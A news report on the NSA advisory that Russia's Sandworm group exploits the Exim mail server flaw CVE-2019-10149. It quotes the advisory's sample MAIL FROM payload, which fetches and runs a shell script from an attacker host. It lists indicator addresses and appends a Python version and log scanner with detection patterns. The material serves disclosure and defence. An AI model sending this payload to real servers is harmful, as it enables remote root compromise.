2020-05-29

A group of Russian hackers linked to attacks on Ukraine's power grid, the world's most destructive data-wiping worm, and other nefarious Kremlin operations is exploiting a vulnerability that lets it take control of computers operated by the US government and its partners.

In an advisory released Thursday, the US National Security Agency said the Sandworm group has been actively exploiting a vulnerability in Exim, an open-source mail transfer agent (MTA) for Unix-based operating systems. Tracked as CVE-2019-10149, the critical flaw makes it possible for an unauthenticated remote attacker to send specially crafted emails that execute commands with root privileges. With that, the attacker can install programs of their choice, modify data, and create new accounts.

A patch for CVE-2019-10149 has been available since last June. The attacks have been under way since at least August. NSA officials wrote:

Actors exploited victims using Exim software on their public MTAs by sending a command in the "MAIL FROM" field of an SMTP (Simple Mail Transfer Protocol) message. Below is a sample, containing parameters that the actor would modify per implementation.

MAIL FROM:<${run{\x2Fbin\x2Fsh\t-c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20http:\x2F\x2Fhostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be>

Hex-decoded command: /bin/sh -c "exec /usr/bin/wget -O - http://hostapp.be/script1.sh | bash"

Figure 1: Example of exploitation command in "MAIL FROM"

When CVE-2019-10149 is successfully exploited, an actor can execute the code of their choice. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain. This script would attempt to do the following on the victim machine: add privileged users, disable network security settings, update SSH configurations to enable additional remote access, and execute an additional script to enable follow-on exploitation.

Thursday's advisory said the hackers work for a specific unit, known as the Main Center for Special Technologies, within the GRU, Russia's Main Intelligence Directorate. There is broad agreement among security researchers that the hacking group operating on behalf of this unit has been responsible for some of the most ambitious and destructive cyberattacks of recent years.

Examples include:

Wired journalist Andy Greenberg recently published Sandworm, a book that chronicles the hacks and the geopolitical tensions surrounding them.

The Exim mail server bug came to light last June, at the same time the developers released a security patch. The advisory says that remote attacks generally require the vulnerable system to be running with non-default settings. In one case, however, remote attacks were possible against a default configuration when the attacker kept a connection to the vulnerable server open for seven days by transmitting one byte every few minutes.

Thursday's advisory did not say how many servers have been successfully compromised, or which regions or industries they are in. Still, the NSA generally does not issue warnings of this kind unless there is cause for concern.

Administrators responsible for Exim servers should verify that they are running version 4.92 or later. As a precaution, they should also check system logs for connections to 95.216.13.196, 103.94.157.5, and hostapp.be, all tied to the ongoing Sandworm campaign.
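As an added example (not from the article or the NSA advisory), a small Python script that carries out the two checks just described: it parses the first line of `exim -bV` output to confirm the version is at least 4.92, and scans mail log lines for the `${run{` string expansion that drives the exploit and for the three indicators named above. The log lines are constructed for illustration, and the matching is deliberately loose because the exact Exim mainlog layout depends on local configuration.

```python
import re
from typing import Dict, List

# Indicators named in the NSA advisory as quoted in the article above.
IOC_HOSTS = {"95.216.13.196", "103.94.157.5", "hostapp.be"}
# First Exim release that fixes CVE-2019-10149, per the article.
FIXED_VERSION = (4, 92)

# Exim's "${run{...}}" string expansion inside a MAIL FROM address is the
# core of the exploit; it has no legitimate reason to appear in a sender.
RUN_EXPANSION = re.compile(r"\$\{run\{", re.IGNORECASE)
# `exim -bV` prints a line such as "Exim version 4.92 #3 built ...".
VERSION_RE = re.compile(r"Exim version (\d+)\.(\d+)")


def exim_is_patched(bv_output: str) -> bool:
    """Return True if the `exim -bV` output reports 4.92 or later."""
    m = VERSION_RE.search(bv_output)
    if not m:
        raise ValueError("could not find an Exim version string")
    return (int(m.group(1)), int(m.group(2))) >= FIXED_VERSION


def scan_log_lines(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per line that carries a ${run{ expansion or references
    one of the campaign hosts. Any line is examined, so this also works on
    syslog-forwarded copies where the Exim layout has been altered."""
    findings = []
    for n, line in enumerate(lines, 1):
        reasons = []
        if RUN_EXPANSION.search(line):
            reasons.append("run-expansion in sender")
        hits = sorted(h for h in IOC_HOSTS if h in line)
        if hits:
            reasons.append("ioc:" + ",".join(hits))
        if reasons:
            findings.append({"line": str(n), "reason": "; ".join(reasons),
                             "text": line.strip()})
    return findings


# Constructed sample lines in the spirit of Exim mainlog entries (not real logs).
SAMPLE_LOG = [
    "2020-05-28 09:12:01 1jdAbc-0001xx-Qz <= alice@example.org H=mail.example.org [198.51.100.7] P=esmtps S=1420",
    "2020-05-28 09:15:44 H=(x) [95.216.13.196] F=<${run{...}}@hostapp.be> rejected RCPT <root@example.org>",
    "2020-05-28 09:20:10 1jdAbd-0001xy-Rk => bob@example.org R=local_user T=local_delivery",
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f['line']}: {f['reason']}")
```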